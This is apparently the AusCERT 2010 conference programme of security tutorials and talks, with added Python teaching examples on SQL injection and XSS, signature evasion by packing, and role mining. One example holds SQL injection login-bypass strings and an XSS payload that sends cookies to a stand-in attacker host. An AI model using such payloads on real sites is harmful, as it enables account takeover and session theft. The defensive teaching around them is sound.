| Assessing and Exploiting Web Applications with Samurai-WTF |
| |
|
Justin Searle
- InGuardians
|
| |
|
This course will focus on using open source tools to perform web application assessments. The course will take attendees through the process of application assessment using the open source tools included in the Samurai Web Testing Framework Live CD (Samurai-WTF). First we will take students through the steps and open source tools used to assess applications for vulnerabilities. Next we will focus on the exploitation of web app vulnerabilities, looking at server-side attacks and then client-side attacks. The latest tools and techniques will be used throughout the course, including several tools developed by the trainers themselves. Justin and Kevin are the founders and lead developers of Samurai-WTF.
Course Outline:
Samurai-WTF Project and Distribution
- About the Project
- Using the Live-DVD
- Joining the Project
Web Application Assessment Methodology
- Pentest Types and Methods
- Formal Four Step Methodology
- Overview of Web Application Security Vulnerabilities
Step 1: Reconnaissance
- Overview of Web Application Recon
- Domain and IP Registration Databases (Labs: whois)
- Google Hacking (Labs: gooscan, gpscan)
- Social Networks (Labs: usernameGen)
- DNS Interrogation (Labs: host, dig, nslookup, fierce)
Step 2: Mapping
- Overview of Mapping
- Port Scanning and Fingerprinting (Labs: nmap, zenmap)
- Web Service Scanning (Labs: Nikto)
- Spidering (Labs: wget, curl, Paros, WebScarab, BurpSuite)
- Discovering "Non-Discoverable" URLs (Labs: DirBuster)
Step 3: Discovery
- Using Built-in Tools (Labs: Page Info, Error Console, DOM Inspector, View Source)
- Poking and Prodding (Labs: Default User Agent, Cookie Editor, Tamper Data)
- Interception Proxies (Labs: Paros, WebScarab, BurpSuite)
- Semi-Automated Discovery (Labs: RatProxy)
- Automated Discovery (Labs: Grendel-Scan, w3af)
- Information Discovery (Labs: CeWL)
- Fuzzing (Labs: JBroFuzz, BurpIntruder)
- Finding XSS (Labs: TamperData, XSS-Me)
- Finding SQL Injection (Labs: SQL Inject-Me, SQL Injection)
- Decompiling Flash Objects (Labs: Flare)
Step 4: Exploitation
- Username Harvesting (Labs: python)
- Brute Forcing Passwords (Labs: python)
- Command Injection (Labs: w3af)
- SQL Injection (Labs: SQLMap, SQLNinja)
- XSS (Labs: Durzosploit)
- Browser Exploitation (Labs: BeEF, BrowserRider) |
| |
|
| Enterprise Resilience through effective Business Continuity Management |
| |
|
Guy Peterson & Alan Fraser & Mick Grover
- BOARTES Consulting and Booz & Company
|
| |
|
Participants will be provided with a solid overview of Enterprise Resilience and Business Continuity Management. Participants will be provided with an understanding of the history, evolution and practice of Business Continuity Management, and will be stepped through the process of implementing a Business Continuity Management Program and developing a supporting Business Continuity Plan (BCP) Framework. Key steps will include:
1. Establish Planning Roles and Responsibilities
2. Conduct Risk Assessment
3. Conduct Business Impact Analysis
4. Develop Continuity Strategies
5. Plan Testing, Training, and Exercises
6. Plan Maintenance
Workshops and exercises will be conducted throughout the 7-hour tutorial period to confirm that knowledge transfer has occurred and key objectives have been understood. |
| |
|
| Incident Response tutorial |
| |
|
Mark Goudie & Chris Novak
- Verizon Business
|
| |
|
Verizon Business routinely performs Incident Response training for our Rapid Response retainer clients, and we have trained in excess of 100 organisations in Incident Response around the globe. We are offering our experience and expertise in this field to AusCERT 2010 attendees. All aspects of Incident Response will be addressed in this tutorial, including: Foundations; Evidence identification; Evidence acquisition; Evidence handling; Evidence collection and management; Crime scene integrity; Scope management; and Basic computer forensics. Practical examples in evidence acquisition of disks and memory will be carried out by participants using their own equipment. In addition, other training aids will be provided, including: Evidence collection bags; Incident response log books; Sample chain of custody forms; CDs of open source tools; and Sample incident response forms.
Synopsis: The participants will learn a three-phase approach to Investigative Response:
1. Incident Response is the triage operation where the incident is identified and contained, and evidence is acquired in a forensically sound manner;
2. Forensic analysis is the in-depth analysis of the data gathered in the incident response phase of the investigation. Data is analysed using a variety of tools and methods to determine who did what, when and where; and
3. Litigation Support is provided to assist the organisation's legal personnel in understanding the often complicated issues arising from forensic analysis.
The proposed tutorial covers all aspects of Incident Response (IR) and offers a brief look at some forensic analysis techniques for the participants. |
| |
|
| AusCERT2010 Executive Program |
| |
Whitfield Diffie, Dr Nick Tate, Professor Danny Smith & Bob Maley
- various organisations
|
| |
|
We all know that being CxO of a major organisation is an enormous responsibility, involving some of the most difficult management decisions. Become more confident in managing your organisation’s information security at the executive level. Learn from senior information security experts and network with other managers. The goal of the AusCERT2010 Executive Program is to get to the heart of the issues facing executives managing information security and its related impacts at a strategic level, by exploring scenarios that only senior managers face. This program has been developed specifically for CEOs, CIOs and senior managers of major Australian organisations to network with their peers and discuss such issues in an informal atmosphere. At the AusCERT2010 Executive Program, CEOs, CISOs and senior managers will gain advice from leading cyber security experts and other executive managers. The session provides executives with an opportunity to discuss their security problems in a non-technical forum with leaders of other organisations facing the same sorts of challenges. |
| |
|
| AusCERT Turbo Talks |
| |
|
|
| |
|
A series of rapid-fire 5 minute presentations by AusCERT2010 delegates. Sign-ups will open at the start of Monday's conference program and will close at the end of Monday's proceedings. To register your turbo talk, please seek out AusCERT staff at the AusCERT stand (during breaks is preferred) on Monday. A staff member will be assigned to record and assess your idea on the spot. There is no pre-registration available for this session. All proposals must be submitted on Monday, and must be made by existing AusCERT conference delegates or on their behalf. Topic proposals must be related to information security but can otherwise address any aspect of the field, although the AusCERT program committee reserves the right to disallow a topic or speaker without negotiation or recourse for complaint. The final speakers list will be posted during the plenary session on Tuesday morning. During the session, the 5 minute time limit for presenters shall be strictly administered by an independent, third-party chairperson. |
| |
|
| Securing the Internet for a Web 2.0 Collaborative Culture |
| |
|
Gerhard Eschelbeck
- Webroot
|
| |
|
Gerhard’s presentation will discuss the convergence of the latest Web 2.0 and Social Media based threats and the malware economy. The presentation will provide the audience with technical, behavioural and political insight into what the latest threats are and what the New Media providers are doing to protect their users. Particular attention will be paid to new cloud computing platforms in terms of their potential as a platform to launch attacks (i.e. Facebook, Twitter) and how cloud computing technology is emerging as the best-practice technique for protecting both enterprises and consumers. Gerhard will also provide an updated view on the state of the overall threat ecosystem and the latest information about the size and velocity of current threats, and why cloud computing will polarise risk mitigation strategies between the cloud and the endpoint. Finally, as the adoption of cloud computing becomes mainstream, Gerhard will discuss emerging concerns about cloud computing and questions over resiliency and jurisdictional control. |
| |
|
| Beyond Aurora's Veil: A Vulnerable Tale |
| |
|
Derek Manky
- Fortinet
|
| |
|
In 2009, the Conficker worm was dissected by researchers, and then fried by the spotlight on a worldwide stage. One year later, we saw the Aurora assaults similarly glow in the headlines. Defense was tense against these two nasties – yet, in each case, easily circumvented by two potent zero-day exploits that crept in from the digital depths. Derek Manky will provide case studies on the zero-days, along with live demonstrations. Manky will go on to highlight drive-by attacks launched during Conficker's rise, which have fuelled the growth of one of today's largest botnets – Bredolab. He will show the sophisticated techniques and structure Bredolab has developed over the course of a year. Illuminating their shadows, Manky will unveil these threats in order to provide insight and provoke thought for a broader defense strategy, instead of the reactive tunnel-vision that is all too common. |
| |
|
| Securing the New Network: Firewalls in a mobile world |
| |
|
Nicko van Someren
- Juniper Networks
|
| |
|
While the physical topologies of our networks have not changed a great deal over the last decade, the way in which we use these networks has evolved a long way. Corporate networks are still segmented along geographic and functional lines, but their users are increasingly mobile and untethered from the physical net. Services that once resided on corporate servers inside the network are now hosted on clouds of servers in far-flung locations. Where once there were one-to-one mappings between users and services and their respective IP addresses, now the network addresses can vary moment to moment. In this world, old models for network security begin to break down and we need to look at network security problems in a whole new way. In this talk we present a new approach to network security, one that focuses on users, devices and services rather than network topology. We show that thinking about network security in this way can lead to systems that are more flexible and more manageable as well as being more secure. |
| |
|
| Securing the 21st Century |
| |
|
Andy Solterbeck
- Telstra
|
| |
|
Telstra will present an overview of our approach to securing the 21st Century workspace. The presentation includes current real-world security case studies, including their origin, consequences and, most importantly, remediation. The intent of this presentation is to highlight the service provider's unique capabilities, covering capacity, visibility and skills, to defend your changing borders from hacking or large-scale DoS attacks. |
| |
|
| The Anatomy of an Attack - Modern Fraud Detection |
| |
|
Colby DeRodeff
- ArcSight
|
| |
|
The rise of the Internet as a transaction platform has brought great change to the financial services, manufacturing, power, healthcare, retail, and related industries. Driven to cut operating costs and provide better response through self-service, firms have aggressively rolled out online services to clients. As customers become more comfortable using Web systems for payments, transfers and other transactions, the amount of money moved via online services has exploded. As a result, fifteen years into the “Internet revolution” we see more users than ever before, executing more transactions online than ever before. These may be bill payments or wire transfers, self-service stock trades, or personal payments through services such as PayPal. This rise in online finance has been matched by an equal rise in malware, hackers, and organized criminals, using increasingly sophisticated methods to steal money from clients. The overall result is more money at risk, more fraud, and less trust in online financial services. Recent examples include:
- Bots executing “man in the browser” attacks to steal funds during fully authenticated sessions
- Phishing attacks to capture authentication credentials
- Payment card number theft and illegal purchases online using stolen account numbers
This presentation will explore fundamental fraud concepts across multiple business verticals as well as threats from outside and within the organization. We will take an in-depth look at the most prevalent threats for the coming years as well as advanced prevention, detection and response mechanisms. The presentation will explore several real-life use cases focused on bringing network, application, and database countermeasures together to mitigate fraud. Areas of focus will include:
- An historical overview of fraud
- People
- Process
- Technology
- What are the threats today and possibly tomorrow
- Multiple use cases outlining several forms of fraudulent activity
  - Fraudulent Account Take Over
  - Data Manipulation
  - Business Logic Abuse
  - Fraudulent Transaction Detection
|
| |
|
| Dude Where's My Data - Web Application and Database Security Deconstructed |
| |
|
Terry Ray
- Imperva
|
| |
|
Daily incidents of unauthorized data access attempts grew exponentially from 2008 to 2009. SQL Injection, administrative privilege escalation and other such activities are estimated to have affected 80% of organizations, whether they were aware of the event or not. There has been no evidence of this data attack or access trend diminishing, and yet there is still little standard industry knowledge or practice around preventing those activities. This presentation will explore today's data security statistics and issues, as well as the tactics, both successful and unsuccessful, organizations use to combat this problem. The most common access points to organizational data are web-based applications and direct database administration. The discussion will focus on these access points and the backend databases themselves. |
| |
|
| BZM XNT BQZBJ SGD BNCD? |
| |
|
Paul Ducklin
- Sophos
|
| |
|
Can you crack the code? Come to this talk for a fascinating live demonstration of code-breaking through the ages. We won't just talk about how codes and ciphers get broken, or how they fail, we'll actually carry out the cracks live. From the ancient Spartans and Julius Caesar, through the ciphers of Blaise de Vigenere and Thomas Jefferson (a cryptographer more famous as the third President of the USA), right to modern cryptosystems such as WEP and SSL. Being interesting and entertaining is only a secondary goal of this talk. The primary goal is to convince you, by actions rather than by words (and without mentioning any products, honestly!), of two things: that encryption is worth doing, and that it is worth doing well. |
| |
|
| e-Crime, the Age of Cybergeddon |
| |
|
Jason Pearce
- M86 Security
|
| |
|
Cybergeddon? The term was coined by the FBI. The current crimeware landscape has been dubbed 'Cybergeddon' because of a combination of the increasing sophistication of cybercriminals and their tools, the low detection and prosecution rate, and the financial stakes, which together triggered a sharp increase in cybercrime during 2009 and into 2010. This session will explore why we are in Cybergeddon, the business impact and the evolution of the criminal element: how the industry operates, the most common techniques used, and the complexity and diversity of the current threat landscape. |
| |
|
| The Future of Digital Security: The Kaspersky Vision |
| |
|
Eugene Kaspersky
- Kaspersky
|
| |
|
In his presentation 'The Future of Digital Security: The Kaspersky Vision', Eugene Kaspersky, CEO and co-founder of Kaspersky Lab, will describe the main factors driving the global cybercrime industry, the main challenges and threats faced by the international community, and the possible side effects of the swift evolution of digital devices, networks and online services. He will also present his vision of the ways in which the cybercrime problem can be solved, or at least improved, globally. |
| |
|
| Maintaining Control and Compliance in Cloud Computing: Data-centric information security |
| |
|
Andrew Younger
- SafeNet
|
| |
|
There’s no doubt about it: virtualization is the future. With their promises of flexibility, ease of use and lower costs, Service Oriented Architectures (SOA) and virtualization have led IT toward the new outsourced computing model known as Cloud. Cloud-based Software-as-a-Service (SaaS) processes have fast become the next-generation SOA solutions for a number of today’s applications, and corporate acceptance of them has moved beyond CRMs and web portals toward more traditional core business applications. The introduction of these approaches into the traditional enterprise has definite business advantages, but also serious governance, compliance and security implications. The "virtual" nature of Cloud removes many of the physical work-flow and control points used to contain sensitive information, so it is essential that a Cloud-enabled security platform take a data-centric approach. This session will provide details on the impact of Cloud on information security and on data-centric solutions for specific use cases:
- What are the information risks of moving to the Cloud?
- How can sensitive information be used within the Cloud?
- What are the data-centric solutions for isolating information in a Cloud?
|
| |
|
| Identity Management - methodologies and tools to make user self service a reality |
| |
|
Paul Conroy
- Microsoft
|
| |
|
IT security teams can deliver tangible benefit to their organisations through identity management. The on-boarding of new users, and the access rights and privileges they receive over the course of their employment, is a fundamental requirement for every organisation. How well this is managed directly affects the control IT security teams have over their environment and how efficient IT staff are within the organisation. Immature identity management systems mean that skilled IT staff perform repetitive functions and make decisions about user privilege that are best left to business owners. This session, dominated by live demonstrations, will give insight into the methodologies and tools used to optimise identity management. A large portion of the session will show mechanisms for provisioning new users into an Active Directory environment based on business rules and workflow, and how these new users can be set up to self-manage groups and distribution lists. There will also be a demonstration of tools for self-service attribute changes and self-service password reset. Most of the session deals with managing identities in an Active Directory world, but time will be spent on tools for integrating AD attributes with other major directory and database platforms. |
| |
|
| Vulnerability & Configuration Management Best Practices |
| |
|
Joe Revels
- Ncircle
|
| |
|
A how-to presentation on creating audience-specific, actionable reporting and processes for minimising vulnerability risk and achieving compliance: what to do with all the data these solutions generate, and who should do what with it. |
| |
|
| The Web is the Battleground; and Social Networks Lead the Charge |
| |
|
Corey Nachreiner
- WatchGuard
|
| |
|
Our web browser has become the universal app. We no longer use it just to peruse static web pages, but to interact with a menagerie of complex online applications hosted “in the cloud.” While this evolution of web interactivity provides us with many new opportunities, and immense value, it has also made today’s web the most dangerous place on the Internet. Join WatchGuard Senior Network Security Strategist and CISSP, Corey Nachreiner, to hear why he believes web-based threats will pose a huge risk to your network in 2010. During the talk, you will learn how the three most common web-based attacks -- drive-by downloads, cross-site scripting (XSS), and SQL injection -- work. You’ll even see them in action during sample attacks. Nachreiner will also discuss why social networking sites are the worst “web-threat” offenders of them all. He’ll highlight three attributes that make social networks a ripe target for attackers, and likely the primary source of malware in the coming years. Finally, and most importantly, you’ll learn practical steps you can take, and defenses you can erect, to protect yourself from these web-based threats. As the American cartoon, G.I. Joe, used to say, “Knowing is half the battle.” Join us at AusCERT to get the knowledge you need to win this web battle! |
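Two of the three attacks the abstract names come down to the same mistake: untrusted input is glued into a language (SQL, HTML) that a parser then interprets. As an added example (not code from the AusCERT programme or from WatchGuard), the block below shows a string-built login query being bypassed with a comment and with a tautology, the parameterised query that defeats both, and an unescaped versus escaped comment rendering for XSS. The schema, the single account, the payloads and the use of sqlite3 as the database are all constructed for this example; drive-by downloads are a browser-exploitation problem and are not modelled here.

```python
# Added example (not from the AusCERT programme or from WatchGuard): SQL
# injection and cross-site scripting, each as the vulnerable construction beside
# its fix.  Schema, account, payloads and the choice of sqlite3 are constructed
# for this example.
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory user table with one constructed account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'correct horse battery staple')")
    return db


def login_vulnerable(db, username: str, password: str):
    """String-built query: attacker input becomes part of the SQL statement."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, username: str, password: str):
    """Parameterised query: input is bound as data and never parsed as SQL.
    (Passwords should also be hashed; the point here is the query shape.)"""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = db.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def render_comment_vulnerable(comment: str) -> str:
    """Reflects user text straight into HTML, so a <script> tag runs in every viewer's browser."""
    return f"<div class='comment'>{comment}</div>"


def render_comment_safe(comment: str) -> str:
    """Escapes <, >, &, and both quote characters so the browser shows the text instead."""
    return f"<div class='comment'>{html.escape(comment, quote=True)}</div>"


# Constructed payloads.
PAYLOAD_SQL_COMMENT = "admin' --"       # closes the string and comments out the password check
PAYLOAD_SQL_TAUTOLOGY = "' OR '1'='1"    # makes the WHERE clause true for every row
PAYLOAD_XSS = "<script>document.location='http://attacker.invalid/?c='+document.cookie</script>"

if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, PAYLOAD_SQL_COMMENT, "wrong"))                    # admin
    print(login_vulnerable(db, PAYLOAD_SQL_TAUTOLOGY, PAYLOAD_SQL_TAUTOLOGY))    # admin
    print(login_safe(db, PAYLOAD_SQL_COMMENT, "wrong"))                          # None
    print(render_comment_vulnerable(PAYLOAD_XSS))
    print(render_comment_safe(PAYLOAD_XSS))
```

The safe variants are not a filter on bad characters but a change of interface: the database receives the query shape and the values separately, and the browser receives text that has been encoded for the context it lands in. Blocklists of quotes and angle brackets, which the vulnerable variants invite, are what attackers have been walking around for a decade.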
| |
|
| Global insight into Web 2.0 in the workplace today |
| |
|
Richard Turner
- Clearswift
|
| |
|
As web communications and collaboration have matured and become ever more integral to people’s lives, companies are increasingly using such technologies to connect more effectively, internally and externally, with customers, suppliers and partners. As the traditional 9-5 way of working continues to fade, companies have to adjust to the new world order that Web 2.0 brings to the workplace, harnessing the benefits whilst being mindful of the potential threats. In this presentation, Richard Turner, chief executive officer, will outline the results of global research conducted in 2010 on behalf of Clearswift. The results explore the good, the bad and the ugly of Web 2.0 from the perspective of managers and employees, and highlight ways in which companies can better harness the benefits of Web 2.0 without losing control over people and content. He will also outline how Australian companies compare with their global counterparts. |
| |
|
| Why Unified Content Security is More Important Than Ever |
| |
|
Devin Redmond
- Websense
|
| |
|
This session will cover:
- Modern, hybrid threats (such as the Aurora attack on Google and other companies) are a chief risk to today’s enterprise
- The drive to reduce costs, compounded with the price tag of defending against these threats, requires a new approach
- Unified content security, with a hybrid architecture, is the key to both addressing these modern threats while reducing their cost of ownership
|
| |
|
| Understanding and Teaching Heuristics |
| |
|
Randy Abrams
- ESET
|
| |
|
This paper is designed to provide a basic understanding of what heuristics are and how they are used in the anti-malware industry. Topics covered include signature based detection, generic signatures, passive heuristics, and active heuristics or emulation. A very basic compression algorithm is developed and taught so as to enhance understanding of how compression works and why it poses problems for signature based detection. Encryption and polymorphism are also explained in easy to understand terms and examples. A variety of false positives from a variety of unspecified products are used to reveal some of the types of thinking that go into creating heuristic approaches. For those who already understand the subject, the approach used should provide insight into effective methods of teaching complex technical subjects to less technical students, or even to technical people who are simply unfamiliar with the subject. |
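The abstract's central point, that compression and encryption defeat byte signatures and that only something which unpacks the sample first gets detection back, is easy to see with a toy packer. As an added example (not code from the AusCERT programme or from ESET), the block below builds a run-length coder and an XOR layer, shows a signature that matches the raw sample but not the packed one, and then an "active" scanner that recognises the packer headers and unwraps each layer before matching, standing in for what an emulator does when it lets the real sample unpack itself. The marker string, the packer formats and the sample bytes are all constructed; none corresponds to a real signature or a real packer.

```python
# Added example (not from the AusCERT programme or from ESET): why a byte
# signature stops matching once a sample is compressed or encrypted, and how an
# active heuristic that unpacks before scanning gets the detection back.
# The packer, the marker bytes and the sample are all constructed for this example.

# What a static signature looks for: a distinctive byte string in the file.
SIGNATURES = {"demo-marker": b"SAMPLE-MALWARE-MARKER"}  # constructed, not a real signature


def rle_compress(data: bytes) -> bytes:
    """Toy run-length coder: 'RLE1' header, then (count, byte) pairs with count <= 255."""
    out = bytearray(b"RLE1")
    i = 0
    while i < len(data):
        run = 1
        while i + run < len(data) and data[i + run] == data[i] and run < 255:
            run += 1
        out += bytes([run, data[i]])
        i += run
    return bytes(out)


def rle_decompress(data: bytes) -> bytes:
    """Inverse of rle_compress: expand each (count, byte) pair after the header."""
    body = data[4:]
    return b"".join(bytes([body[j + 1]]) * body[j] for j in range(0, len(body), 2))


def xor_encrypt(data: bytes, key: int) -> bytes:
    """Toy 'polymorphic' layer: 'XOR1' header, the key byte, then every byte XOR key.
    A new key per copy changes every byte of the body without changing the payload."""
    return b"XOR1" + bytes([key]) + bytes(b ^ key for b in data)


def xor_decrypt(data: bytes) -> bytes:
    key = data[4]
    return bytes(b ^ key for b in data[5:])


def scan_static(data: bytes) -> list:
    """Plain signature matching on the bytes exactly as stored on disk."""
    return [name for name, sig in SIGNATURES.items() if sig in data]


def scan_with_unpacking(data: bytes, max_layers: int = 8) -> list:
    """Active heuristic: recognise the packer stubs, unwrap layer by layer, then
    apply the signatures.  max_layers bounds the work a hostile file can cause."""
    for _ in range(max_layers):
        hits = scan_static(data)
        if hits:
            return hits
        if data.startswith(b"RLE1"):
            data = rle_decompress(data)
        elif data.startswith(b"XOR1"):
            data = xor_decrypt(data)
        else:
            break
    return scan_static(data)


# Constructed sample: a header, some padding, the marker, and a long run that compresses well.
SAMPLE = b"MZ" + b"\x00" * 40 + b"SAMPLE-MALWARE-MARKER" + b"\x90" * 300

if __name__ == "__main__":
    packed = xor_encrypt(rle_compress(SAMPLE), 0x5A)
    print(scan_static(SAMPLE))            # ['demo-marker']
    print(scan_static(packed))            # []
    print(scan_with_unpacking(packed))    # ['demo-marker']
```

The run-length coder breaks the signature even though every payload byte is still present, because each literal now has a count byte in front of it; the XOR layer breaks it because no payload byte survives unchanged. A real packer's stub is code rather than a four-byte header, which is why products emulate the sample instead of pattern-matching the container, and why the layer limit matters: a file that unpacks forever is itself a denial-of-service against the scanner.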
| |
|
| Enhanced PKI Validation with SCVP |
| |
|
Hari Nair
- Axway
|
| |
|
PKI-enabled systems depend on digital certificates to establish identity and trust. However, issuance of digital certificates alone is not enough to ensure the integrity of today’s increasingly complex PKIs. Learn about Axway’s new Validation Authority with Server-based Certificate Validation Protocol (SCVP) and how it can enhance the processing of certificates by any application. It’s no longer enough to simply authenticate when you can authorize, track, monitor and audit. No matter how complicated your trust relationships become, SCVP offers the confidence that users and systems will have the proper credentials when performing transactions. |
| |
|
| Digging for Identity Management Gold: Australian Role Mining Case Study |
| |
|
Nick Engelman
- CA
|
| |
|
Ask most organisations what’s holding up their Identity Management program and they’ll tell you it’s agreeing on the roles. Despite best efforts, access to resources is often based on copying the rights of similar users, adding users to a swathe of sprawling groups, and in more cases than the security officer would like to acknowledge, the ad hoc granting of direct links. They’re effectively stumbling at the first hurdle, as they struggle with the “Role Based” component of RBAC. It’s a self-evident truth that users will (nearly always) end up with the access needed to do their jobs. However, in most organisations this is achieved through over-provisioning, with rights rarely satisfying separation of duties, regulatory and internal policy requirements. Auditing actual rights in such systems requires expert domain knowledge, and profiling and cleaning system access can be likened to painting the Sydney Harbour Bridge … once you finish, it’s time to start again. While over-provisioning must be addressed, the solution is not to ignore or discard the existing system. Role mining seeks to extract the necessary and sufficient rights from the total set of rights currently granted to users, and to identify genuine roles from within the existing system, application and organisational framework. A combination of top-down, bottom-up and blended approaches generates a role model that can be put into place to provide an auditable, manageable role-based solution. This is the building block required for organisations to move to a genuine identity management solution for user management. Join us as we follow the journey of one Australian organisation that undertook the task of profiling their existing applications to extract a tightly-defined, robust and manageable role model that was then put into place to drive their identity management systems. They also achieved compliance and audit targets as a side-benefit of this program of works. |
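The "blended" approach the abstract describes, taking an organisational attribute from the top and the rights people actually hold from the bottom, is small enough to show end to end. As an added example (not code from the AusCERT programme or from CA), the block below mines a candidate role per department from a constructed entitlement dump, reports for each user what lies outside that role (the over-provisioning the abstract warns about) and what role rights they lack, and checks a separation-of-duties rule against the rights as granted. Every user, department, right, rule and threshold here is invented for the example; a real dump would come from directory group membership and application ACLs.

```python
# Added example (not from the AusCERT programme or from CA): a blended
# role-mining pass over a constructed entitlement dump.  Users, rights,
# the SoD rule and the support threshold are all made up for this example.

# Constructed entitlement dump: user -> (department, rights currently granted).
USERS = {
    "alice": ("finance", {"email", "vpn", "erp_ap_view", "erp_ap_post"}),
    "bob":   ("finance", {"email", "vpn", "erp_ap_view", "erp_ap_post", "erp_vendor_create"}),
    "carol": ("finance", {"email", "erp_ap_view", "erp_ap_post"}),
    "dave":  ("it",      {"email", "vpn", "ad_admin", "erp_ap_view"}),
    "erin":  ("it",      {"email", "vpn", "ad_admin"}),
}

# Toxic combinations: nobody should both create a vendor and post payments to it.
SOD_RULES = [("erp_vendor_create", "erp_ap_post")]


def mine_roles(users, min_support=0.6):
    """Candidate role per department: every right held by at least `min_support`
    of that department's members.  A right one person happens to hold is not a role."""
    by_dept = {}
    for dept, rights in users.values():
        by_dept.setdefault(dept, []).append(rights)
    roles = {}
    for dept, members in by_dept.items():
        counts = {}
        for rights in members:
            for r in rights:
                counts[r] = counts.get(r, 0) + 1
        roles[dept] = {r for r, c in counts.items() if c / len(members) >= min_support}
    return roles


def residuals(users, roles):
    """Per user: rights outside their role (review or revoke candidates) and role
    rights they lack (provisioning gaps).  This is the audit list the role model buys you."""
    return {
        user: {"extra": rights - roles[dept], "missing": roles[dept] - rights}
        for user, (dept, rights) in users.items()
    }


def sod_violations(users, rules):
    """Users holding both halves of any toxic pair, checked on rights as granted
    rather than on the mined role, since direct grants are where violations hide."""
    return sorted(
        (user, a, b)
        for user, (_, rights) in users.items()
        for a, b in rules
        if a in rights and b in rights
    )


if __name__ == "__main__":
    roles = mine_roles(USERS)
    print(roles)
    for user, r in residuals(USERS, roles).items():
        if r["extra"] or r["missing"]:
            print(user, r)
    print(sod_violations(USERS, SOD_RULES))
```

On this dump the finance role comes out as email, vpn and the two AP rights; bob's vendor-creation right is flagged as extra and also trips the SoD rule, carol is missing vpn, and dave's read access to the ERP is an IT-side exception worth a question. The support threshold is the knob that decides whether an exception is "part of the job" or "someone copied a colleague's account"; set it too low and the mined roles simply re-bless the over-provisioning you were trying to remove.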
| |
|
| Smartphone Security: From a Perspective of the Ten Immutable Laws of Security |
| |
|
Chris Bender & Ian Robertson
- Blackberry
|
| |
|
First published by Microsoft, the Ten Immutable Laws of Security serve as a framework for describing the prominent risks in contemporary computing. Looking at these in the context of mobility, we will explore where we as an industry are winning, and where we are still challenged in the risk management and security game. Considering the situations where mobility is being used, the types of information accessed or processed and new applications themselves, security is even more important than in the desktop space. When you carry your life with you everywhere you go, what does it take for your security to be considered good enough? |
| |
|
| Beef-Up your security with mobile technologies: An insight for all IT professionals |
| |
|
Jeat Shyan Wong
- TalariaX
|
| |
|
IT professionals face many challenges. One of them is to ensure the security and integrity of their organisation's network infrastructure. However, with greater technological advancement and connectivity, maintaining security is getting more complex. Phishing, hacking, DDoS and other attacks surface daily, requiring IT professionals to enhance their company's security protection. This session will analyse and provide an insight into using mobile technologies to enhance security management in a company. |
| |
|
|